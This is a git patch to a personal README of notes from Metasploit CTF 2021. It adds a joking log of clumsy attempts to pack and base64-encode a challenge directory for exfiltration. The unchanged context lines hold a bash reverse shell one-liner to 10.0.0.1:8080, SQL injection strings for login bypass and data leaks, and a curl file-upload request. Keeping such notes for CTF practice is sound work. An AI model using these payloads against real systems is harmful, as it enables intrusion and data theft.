From ee86bce695ef07c2356746385e1fc73f87a837d0 Mon Sep 17 00:00:00 2001
From: Malfurious <m@lfurio.us>
Date: Sat, 26 Feb 2022 07:03:33 -0500
Subject: Commit notes from Metasploit CTF 2021

Signed-off-by: Malfurious <m@lfurio.us>
---
 README.txt | 24 ++++++++++++++++++++++++
 1 file changed, 24 insertions(+)

(limited to 'README.txt')

diff --git a/README.txt b/README.txt
index c337ce7..b810726 100644
--- a/README.txt
+++ b/README.txt
@@ -20,3 +20,27 @@ bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 # Bash reverse shell
 ' OR 1=1-- # SQL inject (pass)
 ' OR 1=1 UNION SELECT x,y,z FROM table-- # SQL inject (leak)
 curl -i -X POST -d 'a=b&c=d' -F 'f=@file;filename=asdf' URL # curl post request
+
+
+
+**How not to exfil a directory**
+  $ zip challenge/
+  $ gzip challenge
+  $ ls
+  $ ls challenge
+  $ rm challenge.gz
+  $ man gzip
+  $ exit
+**Log Back In**
+  $ gzip -k challenge
+  $ ls
+  $ base64 challenge.gz
+  $ exit
+**Log Back In**
+  $ rm challenge.gz
+  $ tar -czf challenge
+  $ ls
+  $ tar -czf challenge.tar.gz challenge
+  $ ls
+  $ base64 challenge.tar.gz
+  $ exit
-- 
cgit v1.2.3